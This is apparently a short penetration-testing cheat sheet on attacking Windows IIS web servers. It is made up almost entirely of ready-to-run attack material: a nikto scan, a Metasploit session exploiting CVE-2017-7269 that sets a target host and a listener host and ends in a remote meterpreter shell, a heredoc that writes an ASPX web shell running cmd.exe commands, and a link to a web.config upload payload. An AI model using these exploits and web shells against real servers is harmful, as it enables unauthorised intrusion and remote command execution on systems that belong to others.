### IIS ### | Windows IIS | nikto is usefull for IIS servers .. code-block:: bash sudo nikto -host http://IP/ | CVE-2017-7269 ************* | .. code-block:: bash msfconsole msf6 > use iis_webdav_scstoragepathfromurl msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.129.210.101 msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LHOST 10.10.14.60 msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run meterpreter > shell | ASPX WebShell ************* | .. code-block:: aspx cat <<'EOF'>cmd.aspx <%@ Page Language="VB" Debug="true" %> <%@ import Namespace="system.IO" %> <%@ import Namespace="System.Diagnostics" %>

Program c:\windows\system32\cmd.exe

Arguments /c net user

EOF | ASPX web.config *************** | https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config